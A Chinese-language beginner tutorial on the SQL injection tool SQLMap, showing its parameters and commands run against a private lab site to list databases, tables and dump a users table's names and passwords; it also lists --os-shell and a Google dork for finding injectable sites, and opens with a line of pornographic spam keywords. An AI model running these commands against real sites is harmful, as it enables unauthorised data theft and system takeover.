欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

SQLMap簡介及簡單應(yīng)用實例圖文詳解

  發(fā)布時間:2023-02-04 11:37:03   作者:佚名   我要評論
一個自動化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過插件,支持的數(shù)據(jù)庫是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB

1 SQLMap簡介

SQLMap 是一個自動化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過插件,支持的數(shù)據(jù)庫是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。

注意:sqlmap只是用來檢測和利用sql注入點,并不能掃描出網(wǎng)站有哪些漏洞,使用前請先使用掃描工具掃出sql注入點。

SQLMap采用了以下5種獨特的SQL注入技術(shù)。
• 基于布爾類型的盲注,即可以根據(jù)返回頁面判斷條件真假的注入。
• 基于時間的盲注,即不能根據(jù)頁面返回的內(nèi)容判斷任何信息,要用條件語句查看時間延遲語句是否己執(zhí)行(即頁面返回時間是否增加)來判斷。
• 基于報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結(jié)果直接返回到頁面中。
聯(lián)合查詢注入,在可以使用Union 的情況下的注入。. 堆查詢注入,可以同時執(zhí)行多條語句時的注入。

SQLMap 的強大的功能包括數(shù)據(jù)庫指紋識別、數(shù)據(jù)庫枚舉、數(shù)據(jù)提取、訪問目標(biāo)文件系統(tǒng),并在獲取完全的操作權(quán)限時實行任意命令。SQLMap的功能強大到讓人驚嘆,當(dāng)常規(guī)的注入工具不能利用SQL注入漏洞進行注入時,使用SQLMap會有意想不到的效果。

2 SQLMap安裝

SQLMap的安裝方式可以自己上網(wǎng)查找,本教程是利用KaliLinux上自帶的SQLMap工具進行相關(guān)學(xué)習(xí)與實驗,無需自己配置python等基礎(chǔ)環(huán)境,較簡單易上手,如何在虛擬機中安裝KaliLinux系統(tǒng)請查看《【Linux系統(tǒng)】第2節(jié) 虛擬機中安裝Kali系統(tǒng)》。

3 sqlmap的簡單使用 3.1 常用命令及參數(shù)

查看sqlmap的命令字幫助手冊

-u  "url"		#檢測注入點
--dbs			#列出所有數(shù)據(jù)庫的名稱
--current-db	#列出當(dāng)前數(shù)據(jù)庫的名稱
-D				#指定一個數(shù)據(jù)庫
--table			#列出所有表名
-T				#指定表名
--columns		#列出所有字段名
-C				#指定字段
--dump			#列出字段內(nèi)容


post注入
-r xxx.txt #xxx.txt為http數(shù)據(jù)包

–cookie #指定cookie
–os-shell #獲取shell
sqlmap -g “inurl:php?id=” #利用google自動搜索注入點

3.2 具體操作實例 3.2.1 操作前準(zhǔn)備

實驗靶場——虛擬機(IP為172.16.1.1):

本節(jié)實驗靶場是在win2008系統(tǒng)上基于phpstudy搭建的一個簡單網(wǎng)站,win2008及phpstudy的安裝過程可以參考《【語言環(huán)境】WAMP環(huán)境部署及優(yōu)化—以win2008R2SP1為操作系統(tǒng)》,網(wǎng)站的搭建過程可以參考《【(SQL+HTML+PHP)綜合】一個簡單論壇網(wǎng)站的綜合開發(fā)案例

注入工具——kali虛擬機,自帶sqlmap工具

注意,win2008和kali橋接到同一VMnet下。兩者可以互相ping通。

在這里插入圖片描述

3.2.2 具體實例 3.2.2.1 實例1:查看幫助手冊

sqlmap -h

在這里插入圖片描述

3.2.2.2 實例2:檢測注入點及注入類型

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5"

在這里插入圖片描述
在這里插入圖片描述
當(dāng)SQLMap執(zhí)行該命令時,它會執(zhí)行以下步驟:

1)判斷可注入的參數(shù);2)判斷可以用哪種SQL注入技術(shù)來注入;3)識別出哪種數(shù)據(jù)庫;4)根據(jù)用戶選擇,讀取哪些數(shù)據(jù)。 3.2.2.3 實例3:列出所有數(shù)據(jù)庫的名字

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --dbs

在這里插入圖片描述
在這里插入圖片描述

3.2.2.4 實例4:列出當(dāng)前數(shù)據(jù)庫的名字

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" --current-db

在這里插入圖片描述
在這里插入圖片描述

3.2.2.5 實例5:列出某數(shù)據(jù)庫的所有表名

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' --tables

在這里插入圖片描述
在這里插入圖片描述

3.2.2.6 實例6:列出某表中的所有字段名

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' --columns

在這里插入圖片描述
在這里插入圖片描述

3.2.2.7 實例7:列出某字段中的所有字段內(nèi)容

sqlmap -u "http://172.16.1.1/PHP/jrltbbs/showmessage.php?id=5" -D 'jrlt' -T 'users' -C 'name,password' --dump

在這里插入圖片描述
在這里插入圖片描述

3.2.2.8 實例8:post注入

首先利用burpsuite抓到使用post請求方法的http請求數(shù)據(jù)包,將該包保存為post.txt文件(保存在當(dāng)前目錄下)。輸入代碼:sqlmap -r post.txt,會自動讀取http數(shù)據(jù)包來做個post注入的測試

在本專欄博客中,主要以入門知識為主,引領(lǐng)零基礎(chǔ)的伙伴了解一些工具的簡單操作,會分享sqlmap的簡單使用方法,比如:使用該軟件來判斷目標(biāo)網(wǎng)站是否存在注入、查詢獲取數(shù)據(jù)庫的庫名表名字段名以及字段內(nèi)容等信息.其他更詳細(xì)的用法可詳見sqlmap的幫助手冊,如-level、-referer、roles等。

4 參考文章及優(yōu)秀資源推薦

sqlmap 詳解
sqlmap 官網(wǎng)
sqlmap文檔地址》 

相關(guān)文章

最新評論